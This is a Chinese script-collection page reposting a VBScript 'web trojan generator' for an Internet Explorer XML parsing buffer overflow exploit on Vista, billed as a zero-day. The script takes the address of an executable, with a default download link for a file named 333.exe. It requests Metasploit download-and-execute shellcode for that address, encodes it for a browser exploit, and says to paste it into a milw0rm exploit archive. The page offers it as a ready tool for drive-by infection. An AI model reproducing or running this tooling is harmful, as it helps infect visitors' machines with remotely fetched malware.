網(wǎng)馬生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day
來源:易賢網(wǎng) 閱讀:1496 次 日期:2016-07-20 14:06:19
溫馨提示:易賢網(wǎng)小編為您整理了“網(wǎng)馬生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day”,方便廣大網(wǎng)友查閱!

MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day利用代碼

'code by lcx

On Error Resume Next

Exeurl = InputBox( "請輸入exe的地址:", "輸入", "http://www.haiyangtop.net/333.exe" )

url="http://www.metasploit.com:55555/PAYLOADS?parent=GLOB%280x25bfa38%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL="&URLEncoding(Exeurl)&"&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload"

Body = getHTTPPage(url)

Set Re = New RegExp

Re.Pattern = "(\$shellcode \=[\s\S]+</div></pre>)"

Set Matches = Re.Execute(Body)

If Matches.Count>0 Then Body = Matches(0).value

code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"</div></pre>",""),Chr(10),""),".",""))

function replaceregex(str)

set regex=new regExp

regex.pattern="\\x(..)\\x(..)"

regex.IgnoreCase=true

regex.global=true

matches=regex.replace(str,"%u$2$1")

replaceregex=matches

end Function

Function getHTTPPage(Path)

t = GetBody(Path)

getHTTPPage = BytesToBstr(t, "GB2312")

End Function

Function GetBody(url)

On Error Resume Next

Set Retrieval = CreateObject("Microsoft.XMLHTTP")

With Retrieval

.Open "Get", url, False, "", ""

.Send

GetBody = .ResponseBody

End With

Set Retrieval = Nothing

End Function

Function BytesToBstr(Body, Cset)

Dim objstream

Set objstream = CreateObject("adodb.stream")

objstream.Type = 1

objstream.Mode = 3

objstream.Open

objstream.Write Body

objstream.Position = 0

objstream.Type = 2

objstream.Charset = Cset

BytesToBstr = objstream.ReadText

objstream.Close

Set objstream = Nothing

End Function

Function URLEncoding(vstrIn)

strReturn = ""

For aaaa = 1 To Len(vstrIn)

ThisChr = Mid(vStrIn,aaaa,1)

If Abs(Asc(ThisChr)) < &HFF Then

strReturn = strReturn & ThisChr

Else

innerCode = Asc(ThisChr)

If innerCode < 0 Then

innerCode = innerCode + &H10000

End If

Hight8 = (innerCode And &HFF00)\ &HFF

Low8 = innerCode And &HFF

strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)

End If

Next

URLEncoding = strReturn

End Function

set fso=CreateObject("scripting.filesystemobject")

set fileS=fso.opentextfile("a.txt",2,true)

fileS.writeline replaceregex(code)

'fileS.writeline body

wscript.echo replaceregex(code)

files.close

set fso=Nothing

wscript.echo Chr(13)&"ok,生成a.txt,請用a.txt里的替換http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1內(nèi)容即可"

更多信息請查看腳本欄目

2025國考·省考課程試聽報名

  • 報班類型
  • 姓名
  • 手機號
  • 驗證碼
關(guān)于我們 | 聯(lián)系我們 | 人才招聘 | 網(wǎng)站聲明 | 網(wǎng)站幫助 | 非正式的簡要咨詢 | 簡要咨詢須知 | 加入群交流 | 手機站點 | 投訴建議
工業(yè)和信息化部備案號:滇ICP備2023014141號-1 云南省教育廳備案號:云教ICP備0901021 滇公網(wǎng)安備53010202001879號 人力資源服務(wù)許可證:(云)人服證字(2023)第0102001523號
聯(lián)系電話:0871-65099533/13759567129 獲取招聘考試信息及咨詢關(guān)注公眾號:hfpxwx
咨詢QQ:526150442(9:00—18:00)版權(quán)所有:易賢網(wǎng)